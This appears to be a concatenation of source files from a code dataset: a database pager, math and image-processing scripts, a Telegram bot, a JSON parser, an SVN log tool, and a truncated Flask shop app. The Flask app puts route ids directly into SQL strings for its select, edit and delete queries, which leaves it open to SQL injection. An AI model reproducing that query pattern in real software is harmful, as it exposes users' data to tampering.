get_unused_page_num(self) -> int:\n \"\"\"\n NOTE: this depends on num_pages being updated when a new page is requested\n # todo: rename get_free_page_num\n :return:\n \"\"\"\n # first check the on-memory page cache\n if len(self.returned_pages):\n return self.returned_pages.pop()\n\n # check the on-disk free list\n if self.has_free_page_list:\n head_page_num = self.free_page_list_head\n page = self.get_page(head_page_num)\n has_next_page, next_page_num = self.get_free_page_next(page)\n if has_next_page:\n # set current next as free list head\n self.free_page_list_head = next_page_num\n self.has_free_page_list = True\n else:\n self.has_free_page_list = False\n\n return head_page_num\n\n # allocate at end of file\n free_page_num = self.next_allocatable_page_num\n # once allocated, incr page num to avoid double allocation\n self.next_allocatable_page_num += 1\n return free_page_num\n\n def page_exists(self, page_num: int) -> bool:\n \"\"\"\n\n :param page_num: does this page exist/ has been allocated\n :return:\n \"\"\"\n # num_pages counts whole pages\n return page_num < self.num_pages\n\n def get_page(self, page_num: int) -> bytearray:\n \"\"\"\n get `page` given `page_num`\n \"\"\"\n if page_num >= TABLE_MAX_PAGES:\n raise InvalidPageAccess(\n f\"Tried to fetch page out of bounds (requested page 
= {page_num}, max pages = {TABLE_MAX_PAGES})\"\n )\n\n if self.pages[page_num] is None:\n # cache miss. Allocate memory and load from file.\n page = bytearray(PAGE_SIZE)\n\n # determine number of pages in file; there should only be complete pages\n if page_num < self.num_pages:\n # this page exists on file, load from file\n # into `page`\n self.fileptr.seek(FILE_PAGE_AREA_OFFSET + page_num * PAGE_SIZE)\n read_page = self.fileptr.read(PAGE_SIZE)\n assert (\n len(read_page) == PAGE_SIZE\n ), \"corrupt file: read page returned byte array smaller than page\"\n page[:PAGE_SIZE] = read_page\n\n self.pages[page_num] = page\n\n if page_num >= self.num_pages:\n self.num_pages = page_num + 1\n\n if self.next_allocatable_page_num < self.num_pages:\n # next alloc must be at end of file and monotonically increasing\n self.next_allocatable_page_num = self.num_pages\n\n return self.pages[page_num]\n\n def return_page(self, page_num: int):\n \"\"\"\n\n :param page_num:\n :return:\n \"\"\"\n self.returned_pages.append(page_num)\n\n def truncate_file(self):\n \"\"\"\n Check if there are any to-be recycled pages in memory at\n tail of the file. If so truncate file and remove page.\n :return:\n \"\"\"\n if not self.returned_pages or self.file_length == 0:\n \"\"\"\n no in-memory pages, no-op\n \"\"\"\n return\n self.returned_pages.sort()\n page_num = self.returned_pages[-1]\n while page_num:\n # check if: 1) is tail page and 2) is on disk\n if (\n page_num == self.num_pages - 1\n and page_num == self.num_pages_on_disk - 1\n ):\n # truncate file\n self.file_length -= PAGE_SIZE\n assert self.file_length >= 0, f\"invalid file length {self.file_length}\"\n self.fileptr.truncate(self.file_length)\n self.num_pages -= 1\n self.num_pages_on_disk -= 1\n self.returned_pages.pop()\n\n page_num = (\n self.returned_pages[-1] if len(self.returned_pages) > 0 else None\n )\n else:\n break\n\n def close(self):\n \"\"\"\n close the pager. flush header and pages to file\n \"\"\"\n # 1. check and truncate file\n self.truncate_file()\n\n # 2. add pages to on-disk free list\n # current on disk head will become tail of returned page\n # i.e. iteratively prepend to list and at the end update the header\n head_is_defined = self.has_free_page_list\n head = self.free_page_list_head\n while self.returned_pages:\n # 2.1. get free page\n free_page_num = self.returned_pages.pop()\n free_page = self.get_page(free_page_num)\n if head_is_defined:\n # head is defined; set head asset next\n self.set_free_page_next(free_page, head)\n else:\n # head is not defined\n self.set_free_page_next_null(free_page)\n head_is_defined = True\n\n # flush free pages since they contain the next free page pointer\n self.flush_page(free_page_num)\n head = free_page_num\n\n # 3. update header with free list head\n self.set_free_page_head(self.header, head)\n # flush updated header\n self.flush_header()\n\n # 4. flush in-use pages\n # pages are 0-based\n for free_page_num in range(self.num_pages):\n if self.pages[free_page_num] is None:\n continue\n self.flush_page(free_page_num)\n\n # 5. release exclusive lock on file\n fcntl.lockf(self.fileptr, fcntl.LOCK_UN)\n\n # 6. close file\n self.fileptr.close()\n\n # section: internal API\n\n def init(self):\n \"\"\"\n Initialize pager. 
This includes:\n - open database file\n - read file header and get next free page\n - set state vars like num_pages (in file), file length etc.\n - warm up pager cache, by loading pages into dis\n \"\"\"\n # open binary file such that: it is readable, not truncated(random),\n # create if not exists, writable(random)\n # a+b (and more generally any \"a\") mode can only write to end\n # of file; seeks only applies to read ops\n # r+b allows read and write, without truncation, but errors if\n # the file does not exist\n # NB: this sets the file ptr location to the end of the file\n try:\n # file exists\n self.fileptr = open(self.filename, \"r+b\")\n self.read_file_header()\n except FileNotFoundError:\n # file does not exist\n self.fileptr = open(self.filename, \"w+b\")\n self.create_file_header()\n self.file_length = os.path.getsize(self.filename)\n\n # get exclusive lock on file or fail\n # multiple programs may have opened the database file, but only one will get exclusive\n # lock, while the others will get killed and cleaned up\n\n # NOTE: this wont' work on windows\n ex_lock_or_fail = fcntl.LOCK_EX | fcntl.LOCK_NB\n try:\n fcntl.lockf(self.fileptr, ex_lock_or_fail)\n except BlockingIOError:\n self.fileptr.close()\n raise DatabaseFileExclusiveLockNotAvailable(\n \"Another process is operating on database\"\n )\n\n if (\n self.file_length % PAGE_SIZE != 0\n and (self.file_length - FILE_HEADER_SIZE) % PAGE_SIZE != 0\n ):\n logging.error(\"Db file is not a valid size. Corrupt file.\")\n sys.exit(EXIT_FAILURE)\n\n self.num_pages = (\n (self.file_length - FILE_HEADER_SIZE) // PAGE_SIZE\n if self.file_length != 0\n else 0\n )\n self.num_pages_on_disk = self.num_pages\n # next free page is the last page of the file\n self.next_allocatable_page_num = self.num_pages\n\n # warm up page cache, i.e. 
load pages into memory\n # to load data, seek to beginning of file\n self.fileptr.seek(FILE_HEADER_SIZE)\n for page_num in range(self.num_pages):\n self.get_page(page_num)\n\n def create_file_header(self):\n \"\"\"\n generate file header\n :return:\n \"\"\"\n header = bytearray(FILE_HEADER_SIZE)\n assert FILE_HEADER_VERSION_FIELD_SIZE >= len(FILE_HEADER_VERSION_VALUE)\n # set version field\n header[\n FILE_HEADER_VERSION_FIELD_OFFSET : FILE_HEADER_VERSION_FIELD_OFFSET\n + FILE_HEADER_VERSION_FIELD_SIZE\n ] = FILE_HEADER_VERSION_VALUE\n\n # initialize free page head to null\n # NOTE: these are strictly not needed, since a new page would be all zeroes,\n # and the null and false are both encoded as 0.\n # However, this makes explicit what file init should look like, and is robust\n # to scenarios where the above assumptions dont hold.\n value = NULLPTR.to_bytes(FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n header[\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET : FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET\n + FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n # to_bytes takes a byte *length*, so the SIZE constant (not the OFFSET) is the right argument\n value = False.to_bytes(FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE, sys.byteorder)\n header[\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET : FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET\n + FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE\n ] = value\n\n self.header = header\n\n def read_file_header(self):\n \"\"\"\n read the file header, formatted like:\n\n version_string next_free_page has_free_list padding\n version_string -> \"learndb v\"\n next_free_page -> int, next page_num\n has_free_list -> bool, free_page_list\n\n :return:\n \"\"\"\n # read header\n self.fileptr.seek(0)\n self.header = bytearray(self.fileptr.read(FILE_HEADER_SIZE))\n # free page list is set\n has_free_page_list_bytes = self.header[\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET : FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET\n + FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE\n ]\n has_free_page_list = bool.from_bytes(has_free_page_list_bytes, sys.byteorder)\n self.has_free_page_list = has_free_page_list\n # get free list head ptr\n next_free_page_bytes = self.header[\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET : FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET\n + FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE\n ]\n next_free_page = int.from_bytes(next_free_page_bytes, sys.byteorder)\n self.free_page_list_head = next_free_page\n\n @staticmethod\n def get_free_page_next(page: bytes) -> Tuple[bool, int]:\n \"\"\"\n read tuple [has_next, next free page]\n :param page:\n :return: (has_next_free_page, next_free_page_num)\n \"\"\"\n has_next_free_page_bytes = page[\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE\n ]\n has_next_free_page = bool.from_bytes(has_next_free_page_bytes, sys.byteorder)\n next_page_num = 0\n if has_next_free_page:\n value = page[\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE\n ]\n next_page_num = int.from_bytes(value, sys.byteorder)\n return has_next_free_page, next_page_num\n\n @staticmethod\n def set_free_page_next(page: bytearray, next_page_num: int):\n \"\"\"\n set next ptr on page\n :param page:\n :param next_page_num:\n :return:\n \"\"\"\n value = True.to_bytes(FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n # slice bounds must both use the HAS_NEXT offset so the slice length matches len(value)\n page[\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n value = next_page_num.to_bytes(\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder\n )\n page[\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n\n @staticmethod\n def set_free_page_next_null(page: bytearray):\n \"\"\"\n set next ptr null on free page\n \"\"\"\n\n value = False.to_bytes(FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n # as above, both slice bounds use the HAS_NEXT offset\n page[\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n value = NULLPTR.to_bytes(FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n page[\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n\n @staticmethod\n def set_free_page_head(header: bytearray, next_page_num: int):\n value = True.to_bytes(FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE, sys.byteorder)\n header[\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET : FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET\n + FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE\n ] = value\n value = next_page_num.to_bytes(\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder\n )\n header[\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET : FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET\n + FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n\n def flush_header(self):\n \"\"\"\n Flush file header\n :return:\n \"\"\"\n byte_offset = FILE_HEADER_OFFSET\n self.fileptr.seek(byte_offset)\n to_write = self.header\n self.fileptr.write(to_write)\n\n def flush_page(self, page_num: int):\n \"\"\"\n flush/write page to file\n page_num is the page to write\n size is the number of bytes to write\n \"\"\"\n if self.pages[page_num] is None:\n logging.error(\"Tried to flush null page\")\n sys.exit(EXIT_FAILURE)\n\n byte_offset = FILE_PAGE_AREA_OFFSET + page_num * PAGE_SIZE\n self.fileptr.seek(byte_offset)\n to_write = self.pages[page_num]\n self.fileptr.write(to_write)\n","repo_name":"spandanb/learndb-py","sub_path":"learndb/pager.py","file_name":"pager.py","file_ext":"py","file_size_in_byte":16976,"program_lang":"python","lang":"en","doc_type":"code","stars":1145,"dataset":"github-code","pt":"6"}{"seq_id":"17651843317","text":"# periods of nth coefficient of Chebyshev polynomials in Zp\n\n# return all nth coefficients in Zp in first 1000 polynomials\ndef nth_coeff(n, co_eff_lst, p):\n if n == 1: start = 1\n else: start = 2*n - 3\n\n nth_coeff_lst = [co_eff_lst[i][n-1] for i in range(start, 1000)]\n return [i % p for i in nth_coeff_lst]\n\n# select the xth value in the nth coefficient list\ndef f(x, nth_coeff_lst):\n return nth_coeff_lst[x]\n\n# period length function (improve repetition for more reliable data)\ndef findperiod(nth_coeff_lst, minlength=2, repetitions=3):\n while minlength <= 1500:\n cur_lst = [f(i, nth_coeff_lst) for i in range(minlength)]\n for rep in range(1, repetitions):\n lst = [f(i,nth_coeff_lst) for i in range(minlength*rep,minlength*(rep+1))]\n if cur_lst != lst:\n minlength += 1\n break\n else: return minlength","repo_name":"6taco-cat9/chebyshev_polynomials","sub_path":"coefficiant_period.py","file_name":"coefficiant_period.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}{"seq_id":"10711592274","text":"\ndef intro(chat_id,message_id,bot):\n img=\"https://raw.githubusercontent.com/AkkuPY/Sara-Bot/main/Assets/Sara_Bot.jpg\"\n a='''Heyy I'm Sara, Created By AkkuPY @Akku_Legend \nType in /notes to know my True Potential!!!'''\n bot.sendChatAction(chat_id=chat_id, action=\"typing\")\n bot.sendPhoto(chat_id=chat_id, photo=img, 
caption=a,reply_to_message_id = message_id)\n\n\n\ndef note(chat_id,message_id,bot):\n b='''Here Are The List Of Features Currently I Have.\nType in / To get the desired result.\n \n->wiki : Search The Wikipedia About Anything\n->yt_music : YT Mp3 Music Converter\n\nMore Are On the way! \nAdmin:@Akku_Legend '''\n bot.sendChatAction(chat_id=chat_id, action=\"typing\")\n bot.sendMessage(chat_id=chat_id, text=b, reply_to_message_id=message_id)\n","repo_name":"akkupy/Sara-Bot","sub_path":"Modules/Intro_Notes.py","file_name":"Intro_Notes.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"5298750068","text":"import cv2\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport imutils\n\n#read the image\nimg = cv2.imread(r\"G:\\Open Cv\\Car Number Plate Detection\\image1.jpg\") # BGR\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) #coverted into gray to easily can remove the noise\nplt.figure(figsize=(15,15))\n# plt.imshow(gray,cmap='gray')\n# plt.show()\n\n\n#apply filter to remove the noise in the image\naply_filter = cv2.bilateralFilter(gray,11,17,17)\n\n#edge detection\nedg_det = cv2.Canny(aply_filter,30,200)\n# plt.imshow(edg_det,cmap=\"gray\")\n# plt.show()\n\n\n#find the countours in the image\nkeypoints = cv2.findContours(edg_det.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(keypoints)\n\ncontours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n\nlocation = []\nfor contour in contours:\n approx = cv2.approxPolyDP(contour, 10, True)\n if len(approx) == 4:\n location = approx\n break\n\n\nmask = np.zeros(gray.shape, np.uint8)\nnew_image = cv2.drawContours(mask, [location], 0,255, -1)\nnew_image = cv2.bitwise_and(img, img, mask=mask)\n\n# plt.imshow(cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB))\n# plt.show()\n\n\n(x,y) = np.where(mask==255)\n(x1, y1) = (np.min(x), np.min(y))\n(x2, y2) = (np.max(x), np.max(y))\ncropped_image = gray[x1:x2+1, y1:y2+1]\n\nplt.imshow(cropped_image,cmap=\"gray\")\nplt.show()\n\n\n\n\n","repo_name":"CHIRU98/CarNumPlate","sub_path":"number_plate_detection.py","file_name":"number_plate_detection.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"19286954507","text":"from typing import Any\r\n\r\n\r\ndef form(value: Any) -> str:\r\n if isinstance(value, dict):\r\n return \"[complex value]\"\r\n elif isinstance(value, bool):\r\n return str(value).lower()\r\n elif value is None:\r\n return 'null'\r\n elif isinstance(value, int):\r\n return str(value)\r\n return f\"'{str(value)}'\"\r\n\r\n\r\ndef get_child(item: Any) -> Any:\r\n if isinstance(item, dict):\r\n return item[\"children\"]\r\n return item\r\n\r\n\r\ndef to_plain(data: dict, path: str = \"\") -> str:\r\n plain_data = []\r\n data = get_child(data)\r\n for item in data:\r\n new_path = path + str(item[\"key\"])\r\n status = item[\"status\"]\r\n if status == \"added\":\r\n plain_data.append(f\"Property '{new_path}' was added with \"\r\n f\"value: {form(value=item['new'])}\")\r\n elif status == \"delete\":\r\n plain_data.append(f\"Property '{new_path}' was removed\")\r\n elif status == \"changed\":\r\n plain_data.append(f\"Property '{new_path}' was updated. 
\"\r\n f\"From {form(value=item['old'])} \"\r\n f\"to {form(value=item['new'])}\")\r\n elif status == \"nested\":\r\n plain_data.append(to_plain(get_child(item), path=f\"{new_path}.\"))\r\n\r\n return \"\\n\".join(plain_data)\r\n","repo_name":"Madixxx22/python-project-50","sub_path":"gendiff/formatter/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"45626533406","text":"import json\n\nopening_braces = ['[', '{', '\"']\nclosing_braces = [']', '}', '\"']\ncommon_braces = ['\"']\nopen_to_close = { k: v for k, v in zip(opening_braces, closing_braces)}\nclose_to_open = { k: v for k, v in zip(closing_braces, opening_braces)}\n\n# jsonの部分文字列を受け取って、閉じられたjson文字列を返す\n# 例: close_partial_json('{\"foo\": [\"bar\", \"baz\"]') == '{\"foo\": [\"bar\", \"baz\"]}'\n# Mapのキーの途中で終了している場合は、正常なJSONを返さない\ndef close_partial_json(partial_json):\n stack = []\n for char in partial_json:\n if char in common_braces:\n if stack and stack[-1] == char:\n stack.pop()\n else:\n stack.append(char)\n elif stack and stack[-1] in common_braces:\n continue\n elif char in opening_braces:\n stack.append(char)\n elif char in closing_braces:\n if stack[-1] == close_to_open[char]:\n stack.pop()\n else:\n raise ValueError(\"Invalid JSON: missing opening brace for \" + char)\n closed_json = partial_json\n for unclosed_brace in reversed(stack):\n closed_json += open_to_close[unclosed_brace]\n\n return closed_json\n\n\n# jsonの部分文字列を受け取って、parseする。\n# Mapのキーの途中で終了している場合は、Noneを返す\ndef force_parse_json(partial_json, report_error=False, clean_up=True):\n closed_json = close_partial_json(partial_json)\n try:\n response = json.loads(closed_json)\n return clean_up_dict(response) if clean_up else response\n except Exception as e:\n if report_error:\n print(e)\n return None\n \n# Remove empty array and empty value from dict\ndef clean_up_dict(obj):\n if isinstance(obj, dict):\n o = {k: clean_up_dict(v) for k, v in obj.items()}\n o = {k: v for k, v in o.items() if v}\n return o if len(o) > 0 else None\n elif isinstance(obj, list):\n l = [clean_up_dict(v) for v in obj]\n l = [v for v in l if v]\n return l if len(l) > 0 else None\n else:\n return obj","repo_name":"furnqse/gpt-stream-json-parser","sub_path":"gpt_stream_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"4004545386","text":"import numpy as np\n\nfrom util import *\n\nclass ArmVolume:\n def __init__(self, arm, res=100, offset=90, backSize=500):\n self.offset = offset\n self.res = res\n self.samples = np.ndarray(shape=(res,res), dtype=bool)\n self.size = (430-offset, backSize)\n\n self.y_step = self.size[1]/float(res)\n self.x_step = self.size[0]/float(res)\n for y in xrange(res):\n for x in xrange(res):\n pos = [0, (y-res/2)*self.y_step, offset + x*self.x_step]\n self.samples[x,y] = self.trueValid(arm, pos)\n\n def getRadii(self, height):\n y_ind = np.clip(int(height/self.y_step + self.res/2), 0, self.res-1)\n\n min = 0\n max = None\n for x in xrange(self.res):\n if max is None:\n if not self.samples[x, y_ind]:\n min = self.offset + x*self.x_step\n if self.samples[x, y_ind]:\n max = self.offset + x*self.x_step\n\n return min,max\n\n def isValid(self, point):\n \"\"\"Whether or not a potential end-effector position is likely to be\n valid. 
Point must be 2D (in IK plane)\n \"\"\"\n x = int((point[0]-self.offset)/self.x_step)\n y = int(point[1]/self.y_step)\n return self.samples[x, y]\n\n def trueValid(self, arm, point):\n arm.setWristGoalPosition(point)\n if arm.ik.valid:\n pose = arm.getIKPose()\n if pose is not None:\n test = pose.checkClearance()\n else:\n test = False\n else:\n test = False\n return test\n\n\n def projectValid(self, arm, point):\n \"\"\"Projects an invalid point to a valid one\"\"\"\n point = np.array(point)\n # 3D projection target point in plane\n td = normalize([point[0], point[2]])*300\n proj = np.array([td[0], 0, td[1]])\n point += (proj - point)*0.005\n\n iters = 0\n while not self.trueValid(arm, point) and iters < 1000:\n point += (proj - point)*0.005\n iters += 1\n return point\n","repo_name":"AliShug/EvoArm","sub_path":"PyIK/src/armvolume.py","file_name":"armvolume.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"6"} +{"seq_id":"42229690175","text":"# -*- coding: utf-8 -*-\r\n\r\n__all__ = ['POPEN_KW', 'Log', 'get_logs', 'get_log', 'get_revisions']\r\n\r\n\r\nimport os, sys, subprocess\r\nfrom compat import xml2elem, strptime\r\nfrom decoder import safe_decode\r\n\r\nPOPEN_ENV = os.environ.copy()\r\nPOPEN_ENV['LANG'] = 'C'\r\n\r\nPOPEN_KW = dict(stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=POPEN_ENV)\r\n\r\n\r\nclass Log(object):\r\n def __init__(self, url, rev):\r\n self.url = url\r\n self.rev = rev\r\n\r\n xml_data = self._prepare_info(self.url, self.rev)\r\n root = xml2elem(xml_data)\r\n entry = root.find('entry')\r\n self.url = entry.find('url').text\r\n self.root = entry.find('repository').find('root').text\r\n self.subpath = self.url[len(self.root):]\r\n\r\n xml_data = self._prepare_log(self.url, self.rev)\r\n root = xml2elem(xml_data)\r\n entry = root.find('logentry')\r\n self.author = entry.find('author').text\r\n self.date = strptime(entry.find('date').text[:19],'%Y-%m-%dT%H:%M:%S')\r\n self.msg = entry.find('msg').text\r\n\r\n paths = entry.find('paths')\r\n self.paths = [(x.attrib['action'], x.text) for x in paths]\r\n self.diff = self._process_diff(self.url, self.rev, paths)\r\n\r\n #self.normalized_paths = [\r\n # (a, p[len(self.subpath):].lstrip('/'))\r\n # for a,p in self.paths]\r\n\r\n def _prepare_info(self, url, rev):\r\n '''return `utf-8` xml data'''\r\n cmd = ['svn', 'info', '--xml']\r\n cmd.append('-r%s' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n return out\r\n\r\n def _prepare_log(self, url, rev):\r\n '''return `utf-8` xml data'''\r\n cmd = ['svn', 'log', '-v', '--xml']\r\n cmd.append('-r%s' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n return out\r\n\r\n def _prepare_diff(self, url, rev):\r\n '''return `unicode` text data'''\r\n\r\n cmd = ['svn', 'diff']\r\n try:\r\n rev_i = int(rev)\r\n prev_i = rev_i - 1\r\n cmd.append('-r%d:%d' % (prev_i, rev_i))\r\n except:\r\n cmd.append('-r%s' % rev)\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n return safe_decode(out, per_line=True)\r\n\r\n def _process_diff(self, url, rev, path_set):\r\n need_diff = [x for x in path_set\r\n if not (\r\n x.attrib['action'] == 'D' or\r\n (x.attrib['action'] == 'A' and\r\n 'copyfrom-path' in x.attrib)\r\n )]\r\n\r\n if need_diff:\r\n return self._prepare_diff(url, rev)\r\n\r\n else:\r\n # copy or move or delete only\r\n diffs = []\r\n for path in path_set:\r\n attrib = path.attrib\r\n if attrib['action'] == 'A':\r\n diff = 'Copied: %s\\n 
from %s (rev %s)' % (\r\n path.text,\r\n attrib['copyfrom-path'],\r\n attrib['copyfrom-rev'],\r\n )\r\n elif attrib['action'] == 'D':\r\n diff = 'Deleted: %s' % path.text\r\n diffs.append(diff)\r\n\r\n return '\\n'.join(diffs)\r\n\r\n def __repr__(self):\r\n return \"\" % (str(self.rev), str(self.url))\r\n\r\n\r\ndef get_logs(url, rev=None, rev2=None):\r\n \"\"\"\r\n >>> url = 'http://svn.example.com/repos/path'\r\n >>> get_logs(url, 1)\r\n []\r\n >>> get_logs(url, 1, 2)\r\n [, ]\r\n >>> get_logs(url, 1, 3)\r\n [, , ]\r\n >>> get_logs(url, 1, 'HEAD')\r\n [, , ..., ]\r\n \"\"\"\r\n cmd = ['svn', 'log', '--xml']\r\n if rev and rev2:\r\n cmd.append('-r%s:%s' % (str(rev), str(rev2)))\r\n elif rev:\r\n cmd.append('-r%s' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n root = xml2elem(out)\r\n return [Log(url, node.attrib['revision']) for node in root]\r\n\r\n\r\ndef get_log(url, rev):\r\n return get_logs(url, rev)[0]\r\n\r\n\r\ndef get_revisions(urls, rev=None):\r\n \"\"\"\r\n >>> urls = ['http://svn.example.com/repos/path1',\r\n ... 'http://svn.example.com/repos/path2']\r\n\r\n No `rev` supplied, get_revisions return all revisions for urls.\r\n\r\n >>> get_revisions(urls)\r\n [1,2,3,5]\r\n\r\n If `rev` supplied, get_revisions collect logs by 'svn -r rev:HEAD',\r\n then returned revisions include `rev` revision.\r\n\r\n >>> get_revisions(urls, 3)\r\n [3,5]\r\n\r\n If `rev` is greater then repository's newest revision, get_revisions\r\n return empty list.\r\n\r\n >>> get_revisions(urls, 6)\r\n []\r\n\r\n Another call samples:\r\n\r\n >>> get_revisions(urls, None)\r\n [1,2,3,5]\r\n >>> get_revisions(urls, 0)\r\n [1,2,3,5]\r\n >>> get_revisions(urls, '0')\r\n [1,2,3,5]\r\n >>> get_revisions(urls, '3')\r\n [3,5]\r\n >>> get_revisions(urls, 5)\r\n [5]\r\n >>> get_revisions(urls, '6')\r\n []\r\n \"\"\"\r\n revs = set()\r\n for url in urls:\r\n cmd = ['svn', 'log', '--xml']\r\n if rev:\r\n cmd.append('-r%s:HEAD' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n if status == 0:\r\n root = xml2elem(out)\r\n revs.update(int(node.attrib['revision']) for node in root)\r\n\r\n return sorted(revs)\r\n\r\ndef command(cmd):\r\n '''command return communication data by `utf-8` '''\r\n #print \"#DEBUG#\", cmd #FIXME: we need --debug option\r\n proc = subprocess.Popen(cmd, **POPEN_KW)\r\n out, err = proc.communicate()\r\n proc.wait()\r\n out = safe_decode(out, per_line=True).encode('utf-8')\r\n return proc.returncode, out, err\r\n\r\n","repo_name":"klaymenr/svnpoller","sub_path":"src/svnpoller/svnlog.py","file_name":"svnlog.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33871739122","text":"from flask import Flask, render_template, request, redirect\r\nfrom db import mydb, mycursor\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n\r\n@app.route('/admin')\r\ndef admin():\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('seller.html', items = items)\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/additem', methods=['GET', 'POST'])\r\ndef additem():\r\n if request.method == 'GET':\r\n return render_template('post_form.html')\r\n if request.method == 'POST':\r\n _itemname = request.form['itemname']\r\n _price = request.form['price']\r\n _seller = 
request.form['seller']\r\n sql = 'INSERT INTO itemstable (itmename, price, seller) VALUES (%s, %s, %s)'\r\n val = (_itemname, _price, _seller)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n@app.route('/getitems')\r\ndef getitems():\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/edit/', methods=['GET', 'POST'])\r\ndef edit_item(id):\r\n if request.method == 'GET':\r\n mycursor.execute(f'SELECT * FROM itemstable WHERE ID={id}')\r\n items = mycursor.fetchone()\r\n return render_template('edit.html', item = items)\r\n if request.method == 'POST':\r\n _itemname = request.form['itemname']\r\n _price = request.form['price']\r\n _seller = request.form['seller']\r\n sql = f'UPDATE itemstable SET itmename = %s, price = %s, seller=%s WHERE ID = %s'\r\n values = (_itemname, _price, _seller, id)\r\n mycursor.execute(sql, values)\r\n mydb.commit()\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n@app.route('/delete/')\r\ndef delete_item(id):\r\n sql = f'DELETE FROM itemstable WHERE ID={id}'\r\n mycursor.execute(sql)\r\n mydb.commit()\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n\r\n\r\n@app.route('/details/')\r\ndef customer_details(id):\r\n mycursor.execute(f'SELECT * FROM customers 